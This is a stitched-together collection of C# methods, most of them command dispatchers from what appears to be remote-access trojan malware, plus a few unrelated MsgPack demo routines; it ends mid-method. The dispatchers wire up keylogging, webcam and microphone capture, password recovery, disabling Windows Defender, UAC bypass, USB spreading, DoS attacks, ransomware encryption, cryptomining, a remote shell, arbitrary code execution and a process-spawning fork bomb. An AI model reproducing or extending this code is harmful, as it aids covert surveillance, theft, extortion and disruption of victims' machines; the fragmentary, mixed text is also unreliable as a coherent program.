public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "chat":
{
new HandlerChat().CreateChat();
break;
}
case "chatWriteInput":
{
new HandlerChat().WriteInput(unpack_msgpack);
break;
}
case "chatExit":
{
new HandlerChat().ExitChat();
break;
}
}
}
catch { }
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "fileSearcher":
{
SizeLimit = unpack_msgpack.ForcePathObject("SizeLimit").AsInteger;
Debug.WriteLine(SizeLimit + "MB");
foreach (string s in unpack_msgpack.ForcePathObject("Extensions").AsString.Split(' '))
{
if (!string.IsNullOrEmpty(s))
{
Extensions.Add(s.Trim().ToLower());
}
}
Debug.WriteLine(string.Join(", ", Extensions));
Search();
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendFile":
{
new HandleSendTo().SendToDisk(unpack_msgpack);
break;
}
case "sendMemory":
{
new HandleSendTo().SendToMemory(unpack_msgpack);
break;
}
case "xmr":
{
new HandleMiner(unpack_msgpack);
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public void onReceivedTCP(TcpMessage message)
{
MsgPack msgpack = new MsgPack();
msgpack.DecodeFromBytes(message.getContent());
StringBuilder builder = new StringBuilder();
builder.Append("[");
builder.Append("c: ");
builder.Append(msgpack.ForcePathObject("c").AsString);
builder.Append(", ");
builder.Append("d: [");
foreach (MsgPack item in msgpack.ForcePathObject("d"))
{
if (item.ValueType != MsgPackType.Array)
{
builder.Append(item.AsString);
builder.Append(", ");
}
else
{
builder.Append("[");
foreach (MsgPack i in item)
{
builder.Append(i.AsString);
builder.Append(", ");
}
builder.Append("]");
}
}
builder.Append("]");
clientLog(builder.ToString());
}
public static void Read(object data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "processManager":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "List":
{
new HandleProcessManager().ProcessList();
break;
}
case "Kill":
{
new HandleProcessManager().ProcessKill(Convert.ToInt32(unpack_msgpack.ForcePathObject("ID").AsString));
break;
}
}
}
break;
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "webcam":
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "getWebcams":
{
GetWebcams();
break;
}
case "capture":
{
if (IsOk == true)
{
return;
}
IsOk = true;
FilterInfoCollection videoCaptureDevices = new FilterInfoCollection(FilterCategory.VideoInputDevice);
FinalVideo = new VideoCaptureDevice(videoCaptureDevices[0].MonikerString);
Quality = (int)unpack_msgpack.ForcePathObject("Quality").AsInteger;
FinalVideo.NewFrame += CaptureRun;
FinalVideo.VideoResolution = FinalVideo.VideoCapabilities[unpack_msgpack.ForcePathObject("List").AsInteger];
FinalVideo.Start();
break;
}
case "stop":
{
new Thread(() =>
{
try
{
CaptureDispose();
}
catch { }
}).Start();
break;
}
}
break;
}
}
}
catch (Exception ex)
{
Debug.WriteLine("Webcam switch" + ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "wallpaper":
{
new Wallpaper().Change(unpack_msgpack.ForcePathObject("Image").GetAsBytes(), unpack_msgpack.ForcePathObject("Exe").AsString);
break;
}
case "visitURL":
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
if (!url.StartsWith("http"))
{
url = "http://" + url;
}
Process.Start(url);
break;
}
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "disableDefedner":
{
new HandleDisableDefender().Run();
break;
}
case "blankscreen+":
{
new HandleBlankScreen().Run();
break;
}
case "blankscreen-":
{
new HandleBlankScreen().Stop();
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
Connection.Disconnected();
}
public static void Read(object data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "remoteDesktop":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "capture":
{
if (IsOk == true)
{
return;
}
IsOk = true;
CaptureAndSend(Convert.ToInt32(unpack_msgpack.ForcePathObject("Quality").AsInteger), Convert.ToInt32(unpack_msgpack.ForcePathObject("Screen").AsInteger));
break;
}
case "mouseClick":
{
Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
Cursor.Position = position;
mouse_event((Int32)unpack_msgpack.ForcePathObject("Button").AsInteger, 0, 0, 0, 1);
break;
}
case "mouseMove":
{
Point position = new Point((Int32)unpack_msgpack.ForcePathObject("X").AsInteger, (Int32)unpack_msgpack.ForcePathObject("Y").AsInteger);
Cursor.Position = position;
break;
}
case "stop":
{
IsOk = false;
break;
}
case "keyboardClick":
{
bool keyDown = Convert.ToBoolean(unpack_msgpack.ForcePathObject("keyIsDown").AsString);
byte key = Convert.ToByte(unpack_msgpack.ForcePathObject("key").AsInteger);
keybd_event(key, 0, keyDown ? (uint)0x0000 : (uint)0x0002, UIntPtr.Zero);
break;
}
}
break;
}
}
}
static void Main(string[] args)
{
//MsgPack simp = new MsgPack();
//simp.DecodeFromFile("E:\\1.msgpack");
//Console.WriteLine(simp.ForcePathObject("User.DB.System.DUID").AsInteger);
//Console.ReadLine();
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("p.name").AsString = "张三";
msgpack.ForcePathObject("p.age").AsInteger = 25;
msgpack.ForcePathObject("p.datas").AsArray.Add(90);
msgpack.ForcePathObject("p.datas").AsArray.Add(80);
msgpack.ForcePathObject("p.datas").AsArray.Add("李四");
msgpack.ForcePathObject("p.datas").AsArray.Add(3.1415926);
msgpack.ForcePathObject("Game.iGameID").AsInteger = 1;
// 可以直接打包文件数据
// msgpack.ForcePathObject("p.filedata").LoadFileAsBytes("C:\\a.png");
// 打包成msgPack协议格式数据
byte[] packData = msgpack.Encode2Bytes();
//Console.WriteLine("msgpack序列化数据:\n{0}", BytesTools.BytesAsHexString(packData));
MsgPack unpack_msgpack = new MsgPack();
// 从msgPack协议格式数据中还原
unpack_msgpack.DecodeFromBytes(packData);
System.Console.WriteLine("name:{0}, age:{1}",
unpack_msgpack.ForcePathObject("p.name").AsString,
unpack_msgpack.ForcePathObject("p.age").AsInteger);
Console.WriteLine("==================================");
System.Console.WriteLine("use index property, Length{0}:{1}",
unpack_msgpack.ForcePathObject("p.datas").AsArray.Length,
unpack_msgpack.ForcePathObject("p.datas").AsArray[0].AsString
);
Console.WriteLine("==================================");
Console.WriteLine("use foreach statement:");
foreach (MsgPack item in unpack_msgpack.ForcePathObject("p.datas"))
{
Console.WriteLine(item.AsString);
}
Console.WriteLine(unpack_msgpack.ForcePathObject("Game.iGameID").AsInteger);
// unpack filedata
//unpack_msgpack.ForcePathObject("p.filedata").SaveBytesToFile("C:\\b.png");
Console.Read();
}
static void Test1()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("p.name").AsString = "张三一二三四五六七八九十";
msgpack.ForcePathObject("p.age").AsInteger = 132123456874125;
msgpack.ForcePathObject("p.datas").AsArray.Add(90);
msgpack.ForcePathObject("p.datas").AsArray.Add(80);
msgpack.ForcePathObject("p.datas").AsArray.Add("李四");
msgpack.ForcePathObject("p.datas").AsArray.Add(3.1415926);
msgpack.ForcePathObject("Game.iGameID").AsInteger = 1;
// 可以直接打包文件数据
// msgpack.ForcePathObject("p.filedata").LoadFileAsBytes("C:\\a.png");
// 打包成msgPack协议格式数据
byte[] packData = msgpack.Encode2Bytes();
FileStream fs = new FileStream("d:\\simplemsgpack.dat", FileMode.Append);
fs.Write(packData, 0, packData.Length);
fs.Close();
//Console.WriteLine("msgpack序列化数据:\n{0}", BytesTools.BytesAsHexString(packData));
MsgPack unpack_msgpack = new MsgPack();
// 从msgPack协议格式数据中还原
unpack_msgpack.DecodeFromBytes(packData);
System.Console.WriteLine("name:{0}, age:{1}",
unpack_msgpack.ForcePathObject("p.name").AsString,
unpack_msgpack.ForcePathObject("p.age").AsInteger);
Console.WriteLine("==================================");
System.Console.WriteLine("use index property, Length{0}:{1}",
unpack_msgpack.ForcePathObject("p.datas").AsArray.Length,
unpack_msgpack.ForcePathObject("p.datas").AsArray[0].AsString
);
Console.WriteLine("==================================");
Console.WriteLine("use foreach statement:");
foreach (MsgPack item in unpack_msgpack.ForcePathObject("p.datas"))
{
Console.WriteLine(item.AsString);
}
Console.WriteLine(unpack_msgpack.ForcePathObject("Game.iGameID").AsInteger);
// unpack filedata
//unpack_msgpack.ForcePathObject("p.filedata").SaveBytesToFile("C:\\b.png");
Console.Read();
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "encrypt":
{
var readValue = Registry.GetValue(@"HKEY_CURRENT_USER\Software\" + Connection.Hwid, "Rans-Status", null);
if (Conversions.ToBoolean(Operators.ConditionalCompareObjectEqual(readValue, "Encrypted", false)))
{
Error(Connection.Hwid + "Already Encrypted!");
return;
}
else
{
var enc = new HandleEncrypt();
enc.Mynote = unpack_msgpack.ForcePathObject("Message").AsString;
Thread.Sleep(1000);
enc.BeforeAttack();
}
break;
}
case "decrypt":
{
var readValue = Registry.GetValue(@"HKEY_CURRENT_USER\Software\" + Connection.Hwid, "Rans-Status", null);
if (Conversions.ToBoolean(Operators.ConditionalCompareObjectEqual(readValue, "Decrypted", false)))
{
Error(Connection.Hwid + "Already decrypted!");
return;
}
else
{
var enc = new HandleDecrypt();
enc.Pass = unpack_msgpack.ForcePathObject("Password").AsString;
Thread.Sleep(1000);
enc.BeforeDec();
}
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "keyLogger":
{
HandleLimeLogger.isON = false;
break;
}
}
}
public static void Read(object data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "audio":
{
AudioRecorder.Audio(Convert.ToInt32(unpack_msgpack.ForcePathObject("Second").AsString));
break;
}
}
}
public static void Read(byte[] Data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(Data);
Console.WriteLine("I recevied a packet from server: " + unpack_msgpack.ForcePathObject("Packet").AsString);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "MessageBox":
{
Console.WriteLine(unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
}
}
static void Test3()
{
MsgPack msgpack = new MsgPack();
msgpack.SetAsUInt64(UInt64.MaxValue - 1);
// 打包成msgPack协议格式数据
byte[] packData = msgpack.Encode2Bytes();
MsgPack unpack_msgpack = new MsgPack();
// 从msgPack协议格式数据中还原
unpack_msgpack.DecodeFromBytes(packData);
Console.WriteLine(unpack_msgpack.GetAsUInt64());
Console.Read();
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "information":
{
Connection.Send(InformationList());
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "regManager":
{
new RegManager(unpack_msgpack);
}
break;
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "visitURL":
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
if (url.StartsWith("http"))
{
Process.Start(url);
}
Connection.Disconnected();
break;
}
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
Connection.Disconnected();
break;
}
case "disableDefedner":
{
new HandleDisableDefender().Run();
Connection.Disconnected();
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "audio":
{
var AR = new AudioRecorder();
AR.StartAR();
Thread.Sleep(100);
DateTime dt1 = DateTime.Now;
while ((DateTime.Now - dt1).TotalMilliseconds < Convert.ToInt32(unpack_msgpack.ForcePathObject("Second").AsString) * 1000)
{
continue;
}
;
AR.SaveAR();
break;
}
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "botKiller":
{
new HandleBotKiller().RunBotKiller();
Connection.Disconnected();
break;
}
case "limeUSB":
{
new HandleLimeUSB().Initialize();
Connection.Disconnected();
break;
}
case "torrent":
{
new HandleTorrent(unpack_msgpack);
Connection.Disconnected();
break;
}
case "shell":
{
HandleShell.StarShell();
break;
}
case "shellWriteInput":
{
if (HandleShell.ProcessShell != null)
{
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
}
break;
}
case "dosAdd":
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "dosAdd";
Connection.Send(msgpack.Encode2Bytes());
break;
}
case "dos":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "postStart":
{
ctsDos = new CancellationTokenSource();
new HandleDos().DosPost(unpack_msgpack);
break;
}
case "postStop":
{
ctsDos.Cancel();
Connection.Disconnected();
break;
}
}
break;
}
case "executeDotNetCode":
{
new HandlerExecuteDotNetCode(unpack_msgpack);
Connection.Disconnected();
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object Obj)
{
Clients client = null;
try
{
object[] array = Obj as object[];
byte[] data = (byte[])array[0];
client = (Clients)array[1];
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(Settings.AES.Decrypt(data));
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "ClientInfo":
{
new HandleListView().AddToListview(client, unpack_msgpack);
break;
}
case "Ping":
{
new HandlePing(client, unpack_msgpack);
break;
}
case "Logs":
{
new HandleLogs().Addmsg(unpack_msgpack.ForcePathObject("Message").AsString, Color.Black);
break;
}
case "thumbnails":
{
new HandleThumbnails(client, unpack_msgpack);
break;
}
case "BotKiller":
{
new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} malwares and killed them successfully", Color.Orange);
break;
}
case "usbSpread":
{
new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} found {unpack_msgpack.ForcePathObject("Count").AsString} USB drivers and spreaded them successfully", Color.Purple);
break;
}
case "Received":
{
new HandleListView().Received(client);
break;
}
case "remoteDesktop":
{
new HandleRemoteDesktop().Capture(client, unpack_msgpack);
break;
}
case "processManager":
{
new HandleProcessManager().GetProcess(client, unpack_msgpack);
break;
}
case "socketDownload":
{
new HandleFileManager().SocketDownload(client, unpack_msgpack);
break;
}
case "keyLogger":
{
new HandleKeylogger(client, unpack_msgpack);
break;
}
case "fileManager":
{
new HandleFileManager().FileManager(client, unpack_msgpack);
break;
}
}
}
catch (CryptographicException)
{
new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong password", Color.Red);
// Settings.Blocked.Add(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]);
client.Disconnected();
return;
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
return;
}
}
public T Deserialize(byte[] input)
{
msgpack = new MsgPack();
msgpack.DecodeFromBytes(input);
return(Decode());
}
public static void Read(Clients Client, byte[] Data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(Data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "ClientInfo":
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
Client.LV = new ListViewItem();
Client.LV.Tag = Client;
Client.LV.Text = string.Format("{0}:{1}", Client.Client.RemoteEndPoint.ToString().Split(':')[0], Client.Client.LocalEndPoint.ToString().Split(':')[1]);
string[] ipinf = cNewGeoUse.GetIpInf(Client.Client.RemoteEndPoint.ToString().Split(':')[0]).Split(':');
Client.LV.SubItems.Add(ipinf[1]);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("HWID").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("User").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
Client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
Client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
Client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Insert(0, Client.LV);
lock (Settings.Online)
Settings.Online.Add(Client);
}));
}
break;
case "Ping":
{
Debug.WriteLine(unpack_msgpack.ForcePathObject("Message").AsString);
}
break;
case "Received":
{
if (Program.form1.listView1.InvokeRequired)
{
Program.form1.listView1.BeginInvoke((MethodInvoker)(() =>
{
Client.LV.ForeColor = Color.Empty;
}));
}
}
break;
case "remoteDesktop":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
RemoteDesktop RD = (RemoteDesktop)Application.OpenForms["RemoteDesktop:" + Client.ID];
try
{
if (RD != null && RD.Active == true)
{
byte[] RdpStream = unpack_msgpack.ForcePathObject("Stream").GetAsBytes();
Bitmap decoded = RD.decoder.DecodeData(new MemoryStream(RdpStream));
if (RD.RenderSW.ElapsedMilliseconds >= (1000 / 20))
{
RD.pictureBox1.Image = (Bitmap)decoded;
RD.RenderSW = Stopwatch.StartNew();
}
RD.FPS++;
if (RD.sw.ElapsedMilliseconds >= 1000)
{
RD.Text = "RemoteDesktop:" + Client.ID + " FPS:" + RD.FPS + " Screen:" + decoded.Width + " x " + decoded.Height + " Size:" + Methods.BytesToString(RdpStream.Length);
RD.FPS = 0;
RD.sw = Stopwatch.StartNew();
}
}
else
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "remoteDesktop";
msgpack.ForcePathObject("Option").AsString = "false";
Client.BeginSend(msgpack.Encode2Bytes());
}
}
catch (Exception ex) { Debug.WriteLine(ex.Message); }
}));
}
}
break;
case "processManager":
{
if (Program.form1.InvokeRequired)
{
Program.form1.BeginInvoke((MethodInvoker)(() =>
{
ProcessManager PM = (ProcessManager)Application.OpenForms["processManager:" + Client.ID];
if (PM != null)
{
PM.listView1.Items.Clear();
string AllProcess = unpack_msgpack.ForcePathObject("Message").AsString;
string data = AllProcess.ToString();
string[] _NextProc = data.Split(new[] { "-=>" }, StringSplitOptions.None);
for (int i = 0; i < _NextProc.Length; i++)
{
if (_NextProc[i].Length > 0)
{
ListViewItem lv = new ListViewItem();
lv.Text = Path.GetFileName(_NextProc[i]);
lv.SubItems.Add(_NextProc[i + 1]);
lv.ToolTipText = _NextProc[i];
Image im = Image.FromStream(new MemoryStream(Convert.FromBase64String(_NextProc[i + 2])));
PM.imageList1.Images.Add(_NextProc[i + 1], im);
lv.ImageKey = _NextProc[i + 1];
PM.listView1.Items.Add(lv);
}
i += 2;
}
}
}));
}
}
break;
}
}
catch (Exception ex)
{
Debug.WriteLine(ex.Message);
}
}
public void Read(object o)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes(data);
Program.form1.Invoke((MethodInvoker)(() =>
{
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "ClientInfo":
{
ThreadPool.QueueUserWorkItem(delegate {
new HandleListView().AddToListview(client, unpack_msgpack);
});
break;
}
case "Ping":
{
new HandlePing().Ping(client, unpack_msgpack);
break;
}
case "Po_ng":
{
new HandlePing().Po_ng(client, unpack_msgpack);
break;
}
case "Logs":
{
new HandleLogs().Addmsg($"From {client.Ip} client: {unpack_msgpack.ForcePathObject("Message").AsString}", Color.Black);
break;
}
case "thumbnails":
{
client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
new HandleThumbnails(client, unpack_msgpack);
break;
}
case "Received":
{
new HandleListView().Received(client);
break;
}
case "Error":
{
new HandleLogs().Addmsg($"Erroe from {client.Ip} client: {unpack_msgpack.ForcePathObject("Error").AsString}", Color.Red);
/*lock (Settings.LockListviewClients)
* {
* client.LV.ForeColor = Color.Empty;
* }*/
break;
}
case "remoteDesktop":
{
new HandleRemoteDesktop().Capture(client, unpack_msgpack);
break;
}
case "processManager":
{
new HandleProcessManager().GetProcess(client, unpack_msgpack);
break;
}
case "socketDownload":
{
new HandleFileManager().SocketDownload(client, unpack_msgpack);
break;
}
case "keyLogger":
{
new HandleKeylogger(client, unpack_msgpack);
break;
}
case "fileManager":
{
new HandleFileManager().FileManager(client, unpack_msgpack);
break;
}
case "shell":
{
new HandleShell(unpack_msgpack, client);
break;
}
case "chat":
{
new HandleChat().Read(unpack_msgpack, client);
break;
}
case "chat-":
{
new HandleChat().GetClient(unpack_msgpack, client);
break;
}
case "reportWindow":
{
new HandleReportWindow(client, unpack_msgpack.ForcePathObject("Report").AsString);
break;
}
case "reportWindow-":
{
if (Settings.ReportWindow == false)
{
MsgPack packet = new MsgPack();
packet.ForcePathObject("Pac_ket").AsString = "reportWindow";
packet.ForcePathObject("Option").AsString = "stop";
ThreadPool.QueueUserWorkItem(client.Send, packet.Encode2Bytes());
return;
}
lock (Settings.LockReportWindowClients)
Settings.ReportWindowClients.Add(client);
break;
}
case "webcam":
{
new HandleWebcam(unpack_msgpack, client);
break;
}
case "dosAdd":
{
new HandleDos().Add(client, unpack_msgpack);
break;
}
case "sendPlugin":
{
new HandleLogs().Addmsg($"Sending plugun to {client.Ip} ……", Color.Blue);
ThreadPool.QueueUserWorkItem(delegate {
client.SendPlugin(unpack_msgpack.ForcePathObject("Hashes").AsString);
});
break;
}
case "fileSearcher":
{
new HandlerFileSearcher().SaveZipFile(client, unpack_msgpack);
break;
}
case "Information":
{
new HandleInformation().AddToInformationList(client, unpack_msgpack);
break;
}
case "Password":
{
new HandlePassword().SavePassword(client, unpack_msgpack);
break;
}
case "Audio":
{
new HandleAudio().SaveAudio(client, unpack_msgpack);
break;
}
case "recoveryPassword":
{
new HandleRecovery(client, unpack_msgpack);
break;
}
}
}));
}
catch
{
return;
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "thumbnails":
{
new HandleThumbnails();
break;
}
case "sendFile":
{
Received();
new HandleSendTo().SendToDisk(unpack_msgpack);
break;
}
case "sendMemory":
{
Received();
new HandleSendTo().SendToMemory(unpack_msgpack);
break;
}
case "recoveryPassword":
{
Received();
new HandlerRecovery(unpack_msgpack);
break;
}
case "defender":
{
new HandleWindowsDefender();
break;
}
case "uac":
{
new HandleUAC();
break;
}
case "close":
{
Methods.ClientExit();
Environment.Exit(0);
break;
}
case "restart":
{
Process.Start(Application.ExecutablePath);
Methods.ClientExit();
Environment.Exit(0);
break;
}
case "uninstall":
{
new HandleUninstall();
break;
}
case "usbSpread":
{
new HandleLimeUSB(unpack_msgpack);
break;
}
case "remoteDesktop":
{
new HandleRemoteDesktop(unpack_msgpack);
break;
}
case "processManager":
{
new HandleProcessManager(unpack_msgpack);
}
break;
case "fileManager":
{
new FileManager(unpack_msgpack);
}
break;
case "botKiller":
{
new HandleBotKiller().RunBotKiller();
break;
}
case "keyLogger":
{
string isON = unpack_msgpack.ForcePathObject("isON").AsString;
if (isON == "true")
{
new Thread(() =>
{
HandleLimeLogger.isON = true;
HandleLimeLogger.Run();
}).Start();
}
else
{
HandleLimeLogger.isON = false;
}
break;
}
case "visitURL":
{
string url = unpack_msgpack.ForcePathObject("URL").AsString;
if (url.StartsWith("http"))
{
Process.Start(url);
}
break;
}
case "dos":
{
switch (unpack_msgpack.ForcePathObject("Option").AsString)
{
case "postStart":
{
ctsDos = new CancellationTokenSource();
new HandleDos().DosPost(unpack_msgpack);
break;
}
case "postStop":
{
ctsDos.Cancel();
break;
}
}
break;
}
case "shell":
{
HandleShell.StarShell();
break;
}
case "shellWriteInput":
{
if (HandleShell.ProcessShell != null)
{
HandleShell.ShellWriteLine(unpack_msgpack.ForcePathObject("WriteInput").AsString);
}
break;
}
case "chat":
{
new HandlerChat().CreateChat();
break;
}
case "chatWriteInput":
{
new HandlerChat().WriteInput(unpack_msgpack);
break;
}
case "chatExit":
{
new HandlerChat().ExitChat();
break;
}
case "pcOptions":
{
new HandlePcOptions(unpack_msgpack.ForcePathObject("Option").AsString);
break;
}
case "reportWindow":
{
new HandleReportWindow(unpack_msgpack);
break;
}
case "torrent":
{
new HandleTorrent(unpack_msgpack);
break;
}
case "executeDotNetCode":
{
new HandlerExecuteDotNetCode(unpack_msgpack);
break;
}
case "blankscreen":
{
HandleBlankScreen.RunBlankScreen();
break;
}
case "webcam":
{
HandleWebcam.Run(unpack_msgpack);
break;
}
//case "netStat":
// {
// HandleNetStat.RunNetStat();
// break;
// }
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString)
{
case "blankscreen+":
{
new HandleBlankScreen().Run();
break;
}
case "blankscreen-":
{
new HandleBlankScreen().Stop();
break;
}
case "Taskbar+":
{
new HandleTaskbar().Show();
break;
}
case "Taskbar-":
{
new HandleTaskbar().Hide();
break;
}
case "Clock+":
{
new HandleClock().Show();
break;
}
case "Clock-":
{
new HandleClock().Hide();
break;
}
case "Desktop+":
{
new HandleDesktop().Show();
break;
}
case "Desktop-":
{
new HandleDesktop().Hide();
break;
}
case "holdMouse":
{
new HandleHoldMouse().Hold(unpack_msgpack.ForcePathObject("Time").AsString);
break;
}
case "swapMouseButtons":
{
new HandleMouseButton().SwapMouseButtons();
break;
}
case "restoreMouseButtons":
{
new HandleMouseButton().RestoreMouseButtons();
break;
}
case "blockInput":
{
new HandleBlockInput().Block(unpack_msgpack.ForcePathObject("Time").AsString);
break;
}
case "openCD+":
{
new HandleOpenCD().Show();
break;
}
case "openCD-":
{
new HandleOpenCD().Hide();
break;
}
case "monitorOff":
{
new HandleMonitor().TurnOff();
break;
}
case "hangSystem":
{
var startInfo = new ProcessStartInfo("cmd.exe");
while (true)
{
Process.Start(startInfo);
}
break;
}
case "webcamlight+":
{
new HandleWebcamLight().Enable();
break;
}
case "webcamlight-":
{
new HandleWebcamLight().Disable();
break;
}
case "playAudio":
{
new HandlePlayAudio().Play(unpack_msgpack.ForcePathObject("wavfile").GetAsBytes());
break;
}
}
}
catch (Exception ex)
{
Error(ex.Message);
}
}
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
case "thumbnails":
{
new HandleGetScreenShot();
break;
}
case "sendFile":
{
Received();
new HandleSendTo().SendToDisk(unpack_msgpack);
break;
}
case "sendMemory":
{
Received();
new HandleSendTo().SendToMemory(unpack_msgpack);
break;
}
case "recoveryPassword":
{
Received();
new HandlerRecovery(unpack_msgpack);
break;
}
case "defender":
{
new HandleWindowsDefender();
break;
}
case "uac":
{
new HandleUAC();
break;
}
case "close":
{
try
{
ClientSocket.Client.Shutdown(SocketShutdown.Both);
ClientSocket.Client.Dispose();
}
catch { }
Environment.Exit(0);
break;
}
case "restart":
{
try
{
ClientSocket.Client.Shutdown(SocketShutdown.Both);
ClientSocket.Client.Dispose();
}
catch { }
Process.Start(Application.ExecutablePath);
Environment.Exit(0);
break;
}
case "uninstall":
{
new HandleUninstall();
break;
}
case "usbSpread":
{
HandleLimeUSB limeUSB = new HandleLimeUSB();
limeUSB.Run();
break;
}
case "remoteDesktop":
{
